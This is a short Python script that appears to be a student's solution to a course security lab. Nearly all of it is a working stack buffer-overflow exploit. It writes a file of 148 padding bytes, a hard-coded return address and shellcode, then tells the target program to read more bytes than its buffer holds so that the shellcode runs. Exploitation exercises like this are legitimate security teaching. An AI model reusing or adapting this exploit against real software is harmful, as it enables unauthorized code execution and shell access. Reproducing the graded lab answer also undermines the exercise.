#!/usr/bin/env python3

import scaffold as p
from scaffold import SHELLCODE
import sys

# Configure Python to print text strings like byte strings. Don't remove this!
sys.stdout.reconfigure(encoding='latin1')

### YOUR CODE STARTS HERE ###

# The encoding='latin1' argument here is pretty important, so don't remove it!
with open('hack', 'w', encoding='latin1') as f:
    f.write('')

p.start()

assert p.recv(30) == 'How many bytes should I read? '

p.send('224\n')

with open('hack', 'w', encoding='latin1') as f:
    f.write('A' * 148 + "\xb0\xda\xff\xff" + SHELLCODE + '\n')

# assert p.recv(18) == 'Here is the file!\n'
print(p.recv(12))

### YOUR CODE ENDS HERE ###
